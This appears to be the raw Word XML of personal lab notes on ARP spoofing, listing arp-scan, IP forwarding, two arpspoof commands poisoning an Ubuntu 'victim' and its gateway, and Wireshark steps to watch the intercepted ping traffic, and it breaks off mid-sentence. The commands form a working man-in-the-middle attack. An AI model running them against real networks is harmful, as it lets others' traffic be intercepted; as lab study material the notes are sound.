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5F6ACC" w14:textId="5245CAC1" w:rsidR="00D53634" w:rsidRDefault="00216EAA">
      <w:r>
        <w:t>Arp spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0363D7FA" w14:textId="0C6EE196" w:rsidR="00216EAA" w:rsidRDefault="00216EAA">
      <w:r>
        <w:t>Setup kali and ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FD994C" w14:textId="3A684F2B" w:rsidR="00216EAA" w:rsidRDefault="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Notedown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address of both </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C80310F" w14:textId="77777777" w:rsidR="00216EAA" w:rsidRDefault="00216EAA"/>
    <w:p w14:paraId="2B2FBAD7" w14:textId="785A2E88" w:rsidR="00216EAA" w:rsidRDefault="00216EAA">
      <w:r>
        <w:t xml:space="preserve">Run this to get gateway </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="002E6BB4">
        <w:t xml:space="preserve">victim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002E6BB4">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002E6BB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD7601" w14:textId="77777777" w:rsidR="00216EAA" w:rsidRDefault="00216EAA" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-scan -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0C370" w14:textId="35BB4C3B" w:rsidR="00216EAA" w:rsidRDefault="00216EAA" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-scan --interface=eth0 </w:t>
      </w:r>
      <w:r w:rsidR="002E6BB4">
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B60DC2E" w14:textId="77777777" w:rsidR="002E6BB4" w:rsidRDefault="002E6BB4" w:rsidP="00216EAA"/>
    <w:p w14:paraId="45301A48" w14:textId="46684899" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:r w:rsidRPr="005E4BCC">
        <w:t>This keeps the Ubuntu victim online while you're in the middle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A0D5E9" w14:textId="17DB0E3C" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">echo 1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> tee /proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F582E44" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="39A97E27" w14:textId="1E394A20" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:r>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kali :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4610F20C" w14:textId="3BAE2094" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>dsniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730AF94E" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="6F8645F2" w14:textId="33B7ED5D" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:r>
        <w:t xml:space="preserve">for gateway </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39096E17" w14:textId="20362458" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2673E1A9" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="7AF534DE" w14:textId="6B026BD9" w:rsidR="00A630B5" w:rsidRDefault="00A630B5" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arpspoof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eth0 -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BD505" w14:textId="77777777" w:rsidR="00A630B5" w:rsidRDefault="00A630B5" w:rsidP="00216EAA"/>
    <w:p w14:paraId="5138F60D" w14:textId="37162BCE" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:r w:rsidRPr="005E4BCC">
        <w:t>Terminal 1: Tell Victim you're the Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2788A4D2" w14:textId="54421A87" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> eth0 -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ubuntu_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gateway </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D25AF37" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="60B88F1E" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Terminal 2: Tell Gateway you're the Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748A022" w14:textId="703217AD" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>arpspoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> eth0 -t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gateway_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ubuntu_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="795F9BAC" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="3FAAF810" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="6FF72381" w14:textId="5F23A075" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="588BB2D8" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="2AE294DA" w14:textId="46BEC397" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:r>
        <w:t xml:space="preserve">go above and apply </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>filter :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ubuntu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B0CFE05" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="61419285" w14:textId="31EE2DA8" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:r>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ubuntu :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F3E22" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="10381564" w14:textId="707DCDE7" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r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0"/>
        <w:gridCol w:w="5065"/>
      </w:tblGrid>
      <w:tr w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w14:paraId="277A726C" w14:textId="77777777" w:rsidTr="005E4BC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0692C4" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E4BCC"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583940DE" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E4BCC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w14:paraId="5FB511FA" w14:textId="77777777" w:rsidTr="005E4B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8450AF" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32180CF0" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Packet number in the capture session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w14:paraId="0A0C7B8B" w14:textId="77777777" w:rsidTr="005E4B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7F85E7" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7740BFD6" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Time (in seconds) since capture began</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w14:paraId="0FC09010" w14:textId="77777777" w:rsidTr="005E4B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EC2E48" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB84F21" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>IP address that sent the packet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w14:paraId="77516460" w14:textId="77777777" w:rsidTr="005E4B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637EF1" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2909C82E" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>IP address that received the packet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w14:paraId="05772E59" w14:textId="77777777" w:rsidTr="005E4B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84A4A6" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63AD2BD3" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Protocol used (here it’s ICMP – used for ping)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w14:paraId="2EA0AEE8" w14:textId="77777777" w:rsidTr="005E4B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39C700" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B942D74" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Packet length in bytes (98 in all your ICMP packets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w14:paraId="26000C8D" w14:textId="77777777" w:rsidTr="005E4B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62C62F" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1959D2FE" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
            <w:r w:rsidRPr="005E4BCC">
              <w:t>Description of the ICMP message (ping request or reply)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="321C1B94" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="0EF71052" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>  192.168.146.130</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> → Your </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ubuntu victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3739D5E2" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>  142.250.71.36</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> → A </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google server</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> (probably from pinging google.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F57ABD2" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="048BC99E" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>  Your</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>victim machine sent a ping</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> to Google (1244)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2777D" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> replied</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> with a response (1243)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E95A8" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>  These</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> are perfectly paired request/reply ICMP packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EB6564" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA"/>
    <w:p w14:paraId="782C583F" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">Since you’re running ARP spoofing from Kali, seeing these packets on Wireshark </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58425023" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">You’ve successfully placed yourself in the </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>middle</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> of the communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0309343F" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">You can </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>see</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> the victim’s ping to Google and the replies coming back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13260D16" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITM is working</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0B0511" w14:textId="17573D75" w:rsidR="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="00216EAA">
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">You’re doing this right now using </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ARP spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve"> — tricking the victim and the router into sending all their traffic through your </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali machine</w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C08377C" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:r w:rsidRPr="005E4BCC">
        <w:t>So now:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4245762D" w14:textId="77777777" w:rsidR="005E4BCC" w:rsidRPr="005E4BCC" w:rsidRDefault="005E4BCC" w:rsidP="005E4BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4BCC">
        <w:t xml:space="preserve">Victim sends a packet to the gateway → it goes to </w:t>
      </w:r>
      <w:r w:rsidRPr="005E4BCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
